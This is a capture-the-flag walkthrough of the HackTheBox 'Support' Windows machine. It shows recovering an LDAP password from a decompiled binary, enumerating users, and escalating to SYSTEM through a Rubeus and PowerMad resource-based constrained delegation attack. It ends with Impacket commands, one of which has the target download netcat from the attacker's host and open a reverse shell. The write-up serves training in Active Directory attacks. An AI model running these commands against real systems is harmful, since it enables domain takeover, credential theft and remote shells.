HackTheBox -Support Walkthrough
Support is an Easy difficulty Windows machine that features an SMB share that allows anonymous authentication. An executable file is found after connecting to the share, and it is used to search the machine’s LDAP server for any available users. The password that the malware uses to bind the LDAP server is found and can be used to conduct additional LDAP queries by reverse engineering, network analysis, or emulation. A user called `support` is identified in the users list, and the `info` field is found to contain his password, thus allowing for a WinRM connection to the machine. Once on the machine, ‘SharpHound’ is used to obtain domain information, and ‘BloodHound’ indicates that the ‘Shared Support Accounts’ group, which the ’support’ user is a member of, has ‘GenericAll’ access on the Domain Controller. A shell with the username “NT Authority\System” is received after a Resource Based Constrained Delegation attack is launched.
Machine Info
Steps conducted in solving this machines
- Network Scanning (nmap, rustscan, dig)
- Web spidering (dirsearch, feroxbuster, nikto, gobuster)
- SMB share enumeration
- Binary decomplication (UserInfo.exe) using dnSPY tool
- Creating python script to decode LDAP authentication creds
- LDAP enumeration
- Permissions review in LDAP domains, get creds and obtain user flag
- Uploading Sharphound binary, creating zip file and analyze the zip file in Bloodhound
- Identifying vulnerability in AD, detect ‘GenericALL’ permission enabled, perform Kerberos Resource-based Constrained Delegation attack
- Using Impacket, powermad and Rubeus to conduct the attack
- Gain Privilege Escalation ( 4 different methods)
Enumeration
- Rustscan
rustscan --accessible -a 10.129.129.84 -r 1-65535 --ulimit 65535
Automatically increasing ulimit value to 65535.
Open 10.129.129.84:53
Open 10.129.129.84:88
Open 10.129.129.84:135
Open 10.129.129.84:139
Open 10.129.129.84:389
Open 10.129.129.84:445
Open 10.129.129.84:464
Open 10.129.129.84:593
Open 10.129.129.84:636
Open 10.129.129.84:3268
Open 10.129.129.84:3269
Open 10.129.129.84:9389
Open 10.129.129.84:49664
Open 10.129.129.84:49667
Open 10.129.129.84:49676
Open 10.129.129.84:49690
Open 10.129.129.84:49695
Open 10.129.129.84:49708
Starting Script(s)
Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-15 02:24 EDT
Initiating Ping Scan at 02:24
Scanning 10.129.129.84 [2 ports]
Completed Ping Scan at 02:24, 3.00s elapsed (1 total hosts)
Nmap scan report for 10.129.129.84 [host down, received no-response]
Read data files from: /usr/bin/../share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.04 seconds
2. Nmap
# Nmap 7.93 scan initiated Tue Aug 15 02:25:14 2023 as: nmap -A -vvv -p 53,88,135,139,389,445,464,593,636,3268,3269 -oN support.nmap 10.129.129.84
Nmap scan report for 10.129.129.84
Host is up, received echo-reply ttl 127 (0.19s latency).
Scanned at 2023-08-15 02:25:15 EDT for 70s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-08-15 06:25:22Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=8/15%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=64DB1A91%P=x86_64-pc-linux-gnu)
SEQ(SP=FE%GCD=1%ISR=10F%TI=I%II=I%SS=S%TS=A)
OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M53CNW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)
Uptime guess: 0.004 days (since Tue Aug 15 02:21:07 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 41632/tcp): CLEAN (Timeout)
| Check 2 (port 59875/tcp): CLEAN (Timeout)
| Check 3 (port 38700/udp): CLEAN (Timeout)
| Check 4 (port 30853/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-08-15T06:25:44
|_ start_date: N/A
TRACEROUTE (using port 3269/tcp)
HOP RTT ADDRESS
1 185.85 ms 10.10.14.1
2 186.24 ms 10.129.129.84
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug 15 02:26:25 2023 -- 1 IP address (1 host up) scanned in 70.69 seconds
Network enumeration
$ dig +nocmd @10.129.129.84 support.htb any +multiline +short +answer
10.129.129.84
dc.support.htb.
dc.support.htb. hostmaster.support.htb. 128 900 600 86400 3600
Adding domains in our /etc/hosts file
127.0.0.1 localhost
127.0.1.1 solaris.localdomain solaris
10.129.129.84 dc.support.htb support.htb
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouter
SMB enumeration
smbclient -N -L \\\10.129.127.134
We have ‘support-tools’ share name. Now we will connect with this share. After connecting we will get few files. We will download all the file in our machine. After downloading these files, I take a look each of the files and from there ‘UserInfo.exe’ seams interesting to me. So I export this file in our dnSpy tool. We can some interesting staffs. We can see the below code where we get a encoded string with a key. Seams like AES encryption. I wrote a python script on this and get the decoded password. The script is given below:
#!/usr/bin/env python3
import base64
def decrypt_password(enc_password, key):
key_bytes = key.encode('utf-8')
enc_bytes = base64.b64decode(enc_password)
dec_bytes = bytearray(enc_bytes)
for i in range(len(dec_bytes)):
dec_bytes[i] = dec_bytes[i] ^ key_bytes[i % len(key_bytes)] ^ 223
return dec_bytes.decode('utf-8')
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = "armando"
decrypted_password = decrypt_password(enc_password, key)
print("Decrypted Password:", decrypted_password)
After running the script we will get a password string which can be used for LDAP enumeration. The enumeration commands are given below:
ldapsearch -x -H ldap://dc.support.htb -D "SUPPORT\ldap" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "CN=Users,DC=SUPPORT,DC=HTB"
ldapdomaindump -u 'support\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' dc.support.htb
After running these commands we will get some information about LDAP domains users and there permissions. We will get several files like JSON, GREP & GOOGLE HTML FILES. From there we can identify that ‘support’ user have the most permissions. From domain users we get a interesting thing.
Looks like password:) lol. Maybe we can use Evil-winrm attack on the support user with this password. After connecting we can get our user flag.
evil-winrm -i dc.support.htb -u support -p 'Iron*****************Watchful'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_ Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evi Info: Establishing connection to remote endpoint
Evil-WinRM PS C:\Users\support\Documents>
Road to Privilege Escalation
Now we have gain access with the local user, we now look for security misconfiguration to gain privilege in the machine. We can use Sharhound and Bloodhound tool for finding AD security misconfig. So first we will upload sharphound in the target machine and run the command like below:
*Evil-WinRM PS C:\Users\support\Documents> upload /home/kali/Downloads/Tools/SharpHound/SharpHound.exe
Info: Uploading /home/kali/Downloads/Tools/SharpHound/SharpHound.exe to SharpHound.exe
support.runap
288 4 KiB claim text document
Data: 1211048 bytes of 1211048 bytes copied Info: Upload successful!
*Evil-WinRM PS C:\Users\support\Documents>
Then we will run the below command:
We will then transfer this zip file into our kali machine and the drag the file into bloodhound tool. After spending some times on enumeration we discover that the “SHARED SUPPORT ACCOUNTS@SUPPORT.HTB” group has the “GenericAll” permission on “DC.SUPPORT.HTB” if we execute the “Shortest Path to Unconstrained Delegation Systems”. We have access to the “shared support accounts@support.htb” group through the “support” user account. providing us with “GenericAll” authority over “DC.SUPPORT.HTB”, which we may use to increase our privileges.
Now that we have gained knowledge about ‘GenericALL’ permission we can craft our attack. To understand this attack this documentation can help you understand the full concept. However we need to generate ‘Kerberos Resource-based Constrained Delegation attack’ too. This attack defines that it’s possible to gain code execution with elevated privileges on a remote computer if you have WRITE privilege on that computer’s AD object. There are some tools we need to generate these attacks:
We then upload Powermad and Rubeus in our target machine.
Then we will follow the below steps:
- Create a new object in AD which will be a fake computer.
- Set the newly created fake computer object to have Constrained Delegation rights.
- Producing the password hashes for the brand-new fake PC.
# Importing PowerMad
Import-Module ./powermad.ps1
# Creating variables for creating fake computer
Set-Variable -Name "ROLEX007" -Value "AMIHACKER"
Set-Variable -Name "victimcomputer" -Value "DC"
# With Powermad, Add the new fake computer object to AD.
New-MachineAccount -MachineAccount (Get-Variable -Name "ROLEX007").Value -Password $(ConvertTo-SecureString 'secretpassword' -AsPlain
Text -Force) -Verbose
# With Built-in AD modules, give the new fake computer object the Constrained Delegation privilege
Set-ADComputer (Get-Variable -Name "victimcomputer").Value -PrincipalsAllowedToDelegateToAccount ((Get-Variable -Name "ROLEX007").Value + '$')
# With Built-in AD modules, check that the last command worked.
Get-ADComputer (Get-Variable -Name "victimcomputer").Value -Properties PrincipalsAllowedToDelegateToAccount
After that we will run our ‘Rebues’ tool in the target machine.
./Rubeus.exe s4u /user:AMIHACKER$ /rc4:DC265511A1D1A7A3CE6F6D2A3FB6BBE1 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: S4U
[*] Using rc4_hmac hash: DC265511A1D1A7A3CE6F6D2A3FB6BBE1
[*] Building AS-REQ (w/ preauth) for: 'support.htb\AMIHACKER$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFcDCCBWygAwIBBaEDAgEWooIEhjCCBIJhggR+MIIEeqADAgEFoQ0bC1NVUFBPUlQuSFRCoiAwHqAD
AgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0YqOCBEAwggQ8oAMCARKhAwIBAqKCBC4EggQq1lnHsC70
Sqgzzy4oPZTnXpDw58Zq0ipB1GgYHIaq3Mu+IbbD85uMfwdmjvQMuotK9i+cTDMS9RRjwg0x13p338TI
9DNMVF46KsLb/BYKDAN/GsjSDnfq0B1Gdm++ECrJbouK4oTc4HM0mIYp4D0lvDBkWEt2Pw9r9YKSd0UI
dltXtWJ7ZzwSCPGOo8iBDJWoAWaOhKKxlweDZOoP8qPyUfGau/Y/F3GxnyW8utlsT/UtjkyXTCwOgnnN
Nuh+wlpFRgr5Oqpr18B8QZ+fLCQ1nIVyyW4JJ7v7XLCY4swg2wxm+iZAxLPuQh2CBo9WLSUFgoFE1/wg
CHlKGD4YbpPO4e65ChLooKbabr4bt+ZkR7ZvJq5ftso4bUWJpFzWZj8FfmcCj4rmEZWH8eFJZ7PjC0+I
+xDgUDqyUE8UwaL29ELjOh3CgKgt1iC+C+//yQrcIhKzTJa1GP0ypvNvAVa2ZGj/XNLt4uFGZ5QkRXs0
bsKwaC0iyuUay2tj1HHIx+W61wwG7gfYCr+1jhM23HKxQKRLwENIecoPd1hYnZtIkteymoaIVfh7q0PH
gC/H2mYWTEFStudwmGtzZpXinZanwckuEbawEV6p+aFXV96qlF5B/ZYBvcvMeK01t7c2by1iyM5hNW1m
DbY7eqVSv5LcABOTbsnPAxyRT5b1Fdo/go1XCqb1qthx5TKpdTLW6Un8m/X8aHbVTeTLnl/B5J/xUcL+
MTOzJd/3P/Uv00uphFnxs/w2UVZ8lIo5SOUohxT7gNON9LcL4nLrg6vuu1McmQLbP0Y7DemlIKWfIz7D
TvVnHBylUHm8yRvjZDrefSu201DR1GftgvV0zrb+iCmToR/9tNaWypYTozGayE9FmQsLwnLpcKatewSB
dw6Y+GduxLi9pdV9F+6utTDVNYg8qv9PXoEs3lCOUc9q2pavUtD/fUYhFc9Z3SF/eO1ttI4IiPqbAgMN
MuOy1br6rZpg5hrBZ7/LjFrlOFCVeDnk+N1TEJvxS9QpEYyvupiPfxPobUwpl4NC4eJ1OZG88G8wKbZD
gukGNsqHewrsmcJbe0AB7j227jZKF/4uUkUKQIfoppYmosKHJ98tA3claAYVJ8Tjc61OaOxRxFRH8bGq
Ci+QfZZh1ESFRnn2Pzu9Ft4dAeHoEzxkAsKWPx/Jp4PZzOPENfk7E9quXkOZw2pTbl+POqwe31tKSYl6
lK/Y9+3kwigvioBqHxVhxtmUVRQ9I0ds5hvNodBD4xAAq3rxrrOnq1IEy9kjiEdLJ80DEXbYycdXiR75
bEcevFY8JZLRWBHPOGJpgg8WTaJ0Kh8RuoqcshkX790Zd9ZSxHy7YYfvF+OGyoTJCabj8kb/fr4A122G
1XHt4Ah2Q+hQUR09sG8Z4hMZtceOkrO8cSgbql20tebK/H8tow5ww6OB1TCB0qADAgEAooHKBIHHfYHE
MIHBoIG+MIG7MIG4oBswGaADAgEXoRIEEGui/u5RNRxMVRy3llVwr2KhDRsLU1VQUE9SVC5IVEKiFzAV
oAMCAQGhDjAMGwpBTUlIQUNLRVIkowcDBQBA4QAApREYDzIwMjMwODE1MTUwNjA5WqYRGA8yMDIzMDgx
NjAxMDYwOVqnERgPMjAyMzA4MjIxNTA2MDlaqA0bC1NVUFBPUlQuSFRCqSAwHqADAgECoRcwFRsGa3Ji
dGd0GwtzdXBwb3J0Lmh0Yg==
[*] Action: S4U
[*] Building S4U2self request for: 'AMIHACKER$@SUPPORT.HTB'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'AMIHACKER$@SUPPORT.HTB'
[*] base64(ticket.kirbi):
doIFqDCCBaSgAwIBBaEDAgEWooIExDCCBMBhggS8MIIEuKADAgEFoQ0bC1NVUFBPUlQuSFRCohcwFaAD
AgEBoQ4wDBsKQU1JSEFDS0VSJKOCBIcwggSDoAMCARehAwIBAaKCBHUEggRxlOhrDdOn9dddQXO5nWZD
6Jn0ZJyyvP2XPVpQ4+CQjJbqFpCoa92fs9KvIaXjCxh3gx9L2K7hRnbdjP4yOCrD4kyoeea+38cazSgb
uu5Kh0p8OBqpQxgM3hUzDh39DD0IniYykum/W4T0DPvNOrGP9mfqcnLNX8/yUi8gWoi21TyEXNDVXdyC
HQrjLZvVSWsrBszLz5zZJdZy9XLeDsLpfbpfvnM0oTt3SS9s4pEGyF6WrzTomxJtme8K+g1vJ3SZNaxo
Z1MR8R7w/o0vcEdzyBX9tArXID8x2byG5WhR7r5NIsHExjDRaH3ANRsn35QnlgwHZyOACOicku2dOjr6
04LCurJA57N484Rczf1Q0QDX00ohsEGqR1sjXiMkWLdj51lqWZNGqbmofm+yVuavijFtwxm34CZ28l1x
Dc5E1256sZO+WOcGn6Fb4KxADBCH2RJZObXtZsrTQvfbygEh2yPcGz2+/pPge/YwROZnHuSZ+t8g2IGg
MyPpIVfZLzIHgx+085kpvyb23RPfuVPcCSEkvnb8z6Qxkh2K/9CYzHKEOakeVElIY/eTJeUyJPysfvk3
pbER2/h/t1Xc5VWRXq4YzpyTr0SHjSai9AkU0aXak040KcaDTA4Bw8BIWzzCcIx5vNZeaAHdED1YAkrz
0wWwsoYO+LoC1Z84wrbtqaj7iml8QqCSEwDeaSltHo3gM8RSqbHowhOxh0uzxDR9TSClexucwhon5O0j
Xy5m4oZBfM2mW23L4fDJhFQ4iXwZfKLkykpWvW9+umZ3Q5fG017dscLLxxLYxKLRLGWlRXnY8fIXQ/PS
ehdNYzMMJpWm7oAas1wckiH9ML7irXcE5AfUS0jIVEN9Ctsln/tQwnUxLYMh8nc2+2novDpFAY0RLDcw
w9QZt0F+UECx994cYNj2Qy2Gg4McSmxloHFiB2+NPgg3R5PJVVWURw1xK+/+awTcxnTlwzX+H3u0A6M8
2LUqvI2Yt7WZ2LmQoFRGSR7/O2iSXSyHtjGeht2Bi4f7Xef1p/fA5f7zykArL86V8EXzyhqAkN448gsa
/reO8hKwQADbmJ5o4vaQX6erf9MoRTCY5GY1lix8FugcgnVTFCL/aJP7X2I6eo91UdGhNNgxFY5ljC4D
oGhaSQR6Tzq/XCji0XgtA6zlCAOwaBOrrDcy1RInWkP79/UK4y2TlKU13/Hgh38RlFja1i3ANN/JDXZk
fg5X7aaWEPs2edhGiDwIxDCHoZ9VWxNoQGqFuXzNt1M6aHmM4eHDZCtiTf4yNCBKZmkS0hoEOMVWaAM2
mmFaavHXO4VeJ5ReNDlEpwrurbSudDq/Ax+btbGjUEElSqoRJAniUrYNKiKYiUjrCXZfF1ZPSgKxJo2C
94pJNj/yIDLoauRlgFzLXrhEcVwgYZTrDrYZhmcDnxmsPkwE919qPf+CHFt29XzshwL+gB+GY4FgI4kh
sUTvOAUvj6duQPCOLtDNOG5MxhC/B/2/r2pk31Hil6Hwj3fLb5o4Umhho4HPMIHMoAMCAQCigcQEgcF9
gb4wgbuggbgwgbUwgbKgGzAZoAMCARehEgQQDpzLiDEuBk6SsCtS6LrNAKENGwtTVVBQT1JULkhUQqIa
MBigAwIBCqERMA8bDWFkbWluaXN0cmF0b3KjBwMFAEChAAClERgPMjAyMzA4MTUxNTA2MTBaphEYDzIw
MjMwODE2MDEwNjA5WqcRGA8yMDIzMDgyMjE1MDYwOVqoDRsLU1VQUE9SVC5IVEKpFzAVoAMCAQGhDjAM
GwpBTUlIQUNLRVIk
[*] Impersonating user 'administrator' to target SPN 'cifs/dc.support.htb'
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':
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
MBYbBGNpZnMbDmRjLnN1cHBvcnQuaHRi
[+] Ticket successfully imported!
Then taking the last hash generated by Rubeus, we take it into a file and save it as ticket.kibri.b64. (Remove all the space from the hash). Then we will run the below command.
base64 -d ticket.kibri.b64 > ticket.kibri
After that we can use ticketconverter tool to convert the .kibri file to .ccache format.
$ ./ticketConverter.py ticket.kirbi admin.ccache
Impacket v0.9.25.dev1+20220119.101925.12de27dc - Copyright 2021 SecureAuth Corporation
[*] converting kirbi to ccache...
[+] done
Now we will use 4 different tools to get administration access in the machine.
1st method
We can use psexec to get administrator access. But first we need to export our admin.ccache in KRB5CCNAME variable. Then run the commands.
$ export KRB5CCNAME=admin.ccache
$ python3 psexec.py support.htb/administrator@dc.support.htb -no-pass -k
2nd method
We can use smbexec tool.
$ export KRB5CCNAME=admin.ccache
$ python3 smbexec.py support.htb/administrator@dc.support.htb -no-pass -k
3rd method
We can use wmiexec tool.
$ export KRB5CCNAME=admin.ccache;./wmiexec.py support.htb/administrator@dc.support.htb -no-pass -k
4th method
We can use atexec tool. We will use this tool uploading nc64 binary and then run the binary to get reverse shell as administrator in our kali machine. We also need to run our python web server in our machine.
export KRB5CCNAME=administrator.ccache;./atexec.py -k -no-pass dc.support.htb 'certutil.exe -f -urlcache http://10.10.14.72:8000/nc64.exe nc.exe & nc .exe -e cmd 10.10.14.72 1337'
Then we will get shell as nt authority\system in our machine.
Conclusion
I want to start by expressing my gratitude to the machine developer. I mean, this machine has taught me a lot of things. However, this machine is useful for those who want to learn about AD misconfiguration and associated attacks. I enjoyed every step of the process of deciphering this machine. wishing for launching machines of this kind in future.